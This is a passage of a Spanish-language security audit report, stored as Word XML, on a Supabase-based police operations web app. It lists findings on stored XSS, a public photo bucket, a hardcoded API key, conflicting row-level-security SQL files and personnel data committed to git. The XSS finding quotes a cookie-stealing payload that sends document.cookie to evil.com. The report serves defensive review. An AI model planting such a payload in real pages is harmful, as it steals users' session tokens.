              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">El archivo SETUP_PERSONAL_PII.sql contiene en texto plano: nombres completos, domicilios particulares (calle y número, localidad, partido), teléfonos celulares, emails personales, números de series de armas de fuego (ej: 'Bersa 13 · F72423'), números de chalecos antibalas, cría/jurisdicción y funciones asignadas de efectivos policiales. Este archivo está en el repositorio de git, lo que significa que aunque se borre ahora, queda en el historial.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si el repositorio alguna vez fue público, todos estos datos están comprometidos. Incluso siendo privado, cualquier persona con acceso al repo o al historial git tiene acceso a información sensible sobre efectivos de seguridad, incluyendo su armamento y domicilio particular.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Inmediatamente: revocar el acceso al repo a quienes no deban tenerlo y auditar quién tuvo acceso. 2) Eliminar el archivo del historial git con git filter-repo o BFG Repo Cleaner. 3) En el futuro, cargar estos datos SOLO desde el Dashboard de Supabase, nunca en archivos del repositorio.</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6"/>
              <w:left w:val="single" w:color="E67E22" w:sz="6"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-03  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS en detalle de historial (inf.oficial e inf.ayudante)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [ALTA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: js/historial.js — función verDetalleHistorial()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">En la función verDetalleHistorial(), los campos inf.oficial e inf.ayudante se insertan directamente en el innerHTML sin pasar por escapeHTML(). Código actual: `&lt;b&gt;Oficial de servicio:&lt;/b&gt; ${inf.oficial||"—"}&lt;/div&gt;`. Si un atacante con acceso a Supabase almacena un payload XSS como nombre de oficial (ej: &lt;img src=x onerror=fetch('https://evil.com?c='+document.cookie)&gt;), se ejecuta al ver el historial.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un usuario autenticado malicioso puede inyectar JavaScript persistente que se ejecuta en el navegador de todos los usuarios que vean el historial. Dado que la app usa localStorage para el estado de sesión y tokens, esto podría usarse para robar tokens de acceso.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplicar escapeHTML() a inf.oficial, inf.ayudante, vd.obs y cualquier otro dato de la BD antes de insertarlo en innerHTML. La función ya existe, solo hay que usarla consistentemente en estas líneas.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6"/>
              <w:left w:val="single" w:color="E67E22" w:sz="6"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-04  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Observaciones de vehículos sin escapar en historial</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [ALTA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: js/historial.js — función verDetalleHistorial()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">En el mismo bloque de código, vd.obs (observaciones de un vehículo) también se inserta sin escapeHTML(): `${vd.obs?.trim() ? `&lt;div&gt;...${vd.obs}&lt;/div&gt;` : ""}`. Este campo es editable por usuarios y se almacena directamente en el JSON de Supabase. Mismo vector que VULN-03.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cualquier usuario que pueda completar el campo 'Observaciones' de un vehículo puede inyectar HTML/JS que se ejecutará cuando otro usuario vea el detalle de ese informe histórico.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Mismo fix que VULN-03: escapeHTML(vd.obs) antes de insertar en innerHTML. Revisar exhaustivamente todos los campos que vienen de la base de datos y se usan en innerHTML.</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6404" w:sz="6"/>
              <w:left w:val="single" w:color="856404" w:sz="6"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-05  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Fotos de novedades en bucket público sin control de acceso</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [MEDIA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: js/fotos.js + Supabase Storage (bucket: fotos-moviles)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Las fotos se suben a un bucket de Supabase y se accede a ellas via getPublicUrl(), que devuelve URLs públicas sin autenticación. Cualquier persona que conozca o adivine la URL puede ver las fotos. La estructura del path (fecha/seccion/ro_timestamp.jpg) es predecible: dado que fecha, sección y número de RO son conocidos, un atacante puede intentar acceder a fotos de cualquier fecha.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Las fotos pueden contener información sensible sobre el estado de vehículos policiales o daños operativos. Al ser públicas, cualquier persona en internet podría acceder si obtiene o adivina la URL.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cambiar el bucket a privado en Supabase Storage. Usar createSignedUrl() con tiempo de expiración corto (ej: 1 hora) en lugar de getPublicUrl(). Las URLs firmadas son imposibles de adivinar y expiran.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6404" w:sz="6"/>
              <w:left w:val="single" w:color="856404" w:sz="6"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-06  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">API key de Supabase hardcodeada en el código fuente</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [MEDIA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: index.html — líneas 580-581</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">La SUPA_KEY (anon key de Supabase) está hardcodeada en el HTML: const SUPA_KEY = 'eyJhbGci...'. Aunque la anon key de Supabase es semi-pública por diseño (el cliente la necesita), tenerla en el source code del repositorio significa que cualquier persona con acceso al repo la conoce, y que no se puede rotar fácilmente sin modificar el código.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si las políticas RLS fallaran (por un error de configuración), cualquier persona con la key podría acceder directamente a la base de datos. Adicionalmente, si se usa en un entorno de build, la key queda expuesta en el historial de git.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1D6A39"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Para una PWA estática, la anon key siempre será visible en el cliente — esto es esperado en Supabase. Sin embargo, para el repositorio, moverla a un archivo .env que esté en .gitignore y no tenga el valor real commiteado. Documentar que la seguridad real viene de las políticas RLS, no de ocultar la key.</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6"/>
              <w:left w:val="single" w:color="1A5276" w:sz="6"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-07  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Inconsistencia entre SETUP_SUPABASE.sql y SETUP_RLS.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [BAJA]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📂 Archivo: SETUP_SUPABASE.sql vs. SETUP_RLS.sql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problema:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Existen dos archivos SQL con configuraciones de seguridad diferentes. SETUP_SUPABASE.sql permite INSERT/UPDATE en la tabla 'personal' a cualquier usuario autenticado (sin restricción de rol). SETUP_RLS.sql correctamente restringe estas operaciones al rol 'jefe'. Si se ejecuta el archivo incorrecto o si se ejecutan ambos (el primero sobrescribiendo al segundo), el acceso control se debilita silenciosamente.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="922B21"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
